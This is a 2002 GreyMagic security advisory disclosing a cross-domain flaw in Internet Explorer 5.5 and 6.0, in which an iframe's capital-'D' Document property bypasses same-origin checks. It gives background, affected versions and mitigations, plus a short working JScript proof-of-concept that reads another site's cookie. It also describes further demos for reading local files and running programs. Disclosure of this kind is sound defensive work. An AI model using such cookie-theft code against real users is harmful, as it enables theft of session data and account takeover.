gm011-ie.txt

`GreyMagic Security Advisory GM#011-IE  
=====================================  
  
By GreyMagic Software, Israel.  
15 Oct 2002.  
  
Available in HTML format at http://security.greymagic.com/adv/gm011-ie/.  
  
Topic: Internet Explorer : The D-Day.  
  
Discovery date: 26 Sep 2002.  
  
Affected applications:  
======================  
  
Microsoft Internet Explorer 5.5 and 6.0; prior versions and IE6 SP1 are not  
vulnerable.  
  
Note that any other application that uses Internet Explorer's engine  
(WebBrowser control) is affected as well (Outlook under the Internet zone,  
MSN Explorer, etc.).  
  
  
Introduction:  
=============  
  
The <frame> and <iframe> elements may contain URLs in other domains or  
protocols, and therefore have strict security rules, which prevent frames in  
one domain to access content and information in another. Microsoft explains  
the issue in this Cross-Frame Scripting article -  
http://msdn.microsoft.com/workshop/author/om/xframe_scripting_security.asp.  
  
There are several ways to refer to an <iframe>'s (or <frame>) document in  
Internet Explorer (assuming <iframe id="oFrameId">):  
  
* oFrameId.document  
* document.all.oFrameId.contentWindow.document  
* frames.oFrameId.document  
* And others..  
  
All these methods are handled correctly by Internet Explorer and prevent any  
attempt to access a document that originates from a foreign domain.  
  
  
Discussion:  
===========  
  
The <iframe> and <frame> elements are really instances of the WebBrowser  
control supplied by Microsoft. The WebBrowser control exposes several  
potentially dangerous properties by default, which Microsoft overrides in  
Internet Explorer.  
  
However, Microsoft missed out on one important property -- "Document", with  
a capital "D".  
  
Normally, using "oElement.document" would provide a reference to the  
document that owns the current element. The same applies to the <frame> and  
<iframe> elements. However, we discovered that when  
"oIFrameElement.Document" is used, the returned document is the one  
contained inside the frame, and there are no security restrictions in place  
to check if it's in a different domain.  
  
This provides free and full access to the frame's Document Object Model,  
which allows an attacker to steal cookies from any site, gain access to  
content in sites (forging content), read local files and execute arbitrary  
programs on the client's machine (script in the "My Computer" zone).  
  
Both Internet Explorer 5.5 SP2 and Internet Explorer 6 are vulnerable, but  
surprisingly this vulnerability does not exist in IE6 SP1. It's hard to  
believe that Microsoft actually meant to plug it as IE5.5 remains  
vulnerable, yet somehow this stray property is now protected.  
  
  
Exploit:  
========  
  
This exploit demonstrates how an attacker may choose to read the client's  
"google.com" cookie.  
  
<script language="jscript">  
onload=function () {  
// Timer necessary to prevent weird behavior in some conditions  
setTimeout(  
function () {  
alert(document.getElementById("oVictim").Document.cookie);  
},  
100  
);  
}  
</script>  
<iframe src="http://google.com" id="oVictim"></iframe>  
  
  
Solution:  
=========  
  
Until a patch becomes available either disable Active Scripting or upgrade  
to IE6 SP1.  
  
  
Tested on:  
==========  
  
IE5.5 Win98.  
IE5.5 NT4.  
IE6 Win98.  
IE6 Win2000.  
IE6 WinXP.  
  
  
Demonstration:  
==============  
  
We put together four proof-of-concept demonstrations:  
  
* Simple: Reads the client's "google.com" cookie.  
* D-Day Console: Automatically load and execute commands on any site.  
* D-Day Reading: Read local files by accessing a res:// URL.  
* D-Day Execution: Execute arbitrary programs by accessing a res:// URL.  
  
They can all be found at http://security.greymagic.com/adv/gm011-ie/.  
  
  
Feedback:  
=========  
  
Please mail any questions or comments to [email protected].  
  
- Copyright © 2002 GreyMagic Software.  
  
`